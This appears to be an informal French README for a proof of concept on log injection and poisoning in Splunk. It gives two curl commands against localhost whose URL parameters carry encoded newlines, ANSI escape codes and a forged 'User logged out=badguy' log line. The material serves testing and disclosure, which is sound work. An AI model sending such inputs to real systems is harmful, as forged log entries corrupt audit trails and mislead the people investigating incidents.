
Preuve de concept démontrant l'injection et l'empoisonnement de journaux dans Splunk via des paramètres d'URL malveillants, mettant en évidence les risques d'injection de journaux OWASP.
je ne sais pas, j'ai juste lu des trucs que mon pote m'a envoyés et j'ai commencé à taper un code javascript de merde au hasard
Veuillez lire cet article OWASP Log Injection
Recherchez un fichier statique, passez-le et ajoutez un paramètre aléatoire
Donc, je lance curl -k "https://localhost:8000/en-US/static/app/search/application.css%0Atest%0A%0A%0AWARN%3A%20User%20logged%20out%3Dbadguy%0A----LOG_INJECTION_TEST_12345----" OR curl -k "https://localhost:8000/en-US/static/app/search/application.css%1B[31mANSI_TEST_RED%1B[0m%0Atest%0A%0A%0AWARN%3A%20User%20logged%20out%3Dbadguy%0A----LOG_INJECTION_TEST_12345----"
Si vous voyez une nouvelle ligne aléatoire apparaître, c'est un empoisonnement. Cela peut sembler anodin car ce n'est qu'un empoisonnement « normal », mais cela peut être gênant si c'est fortement ciblé.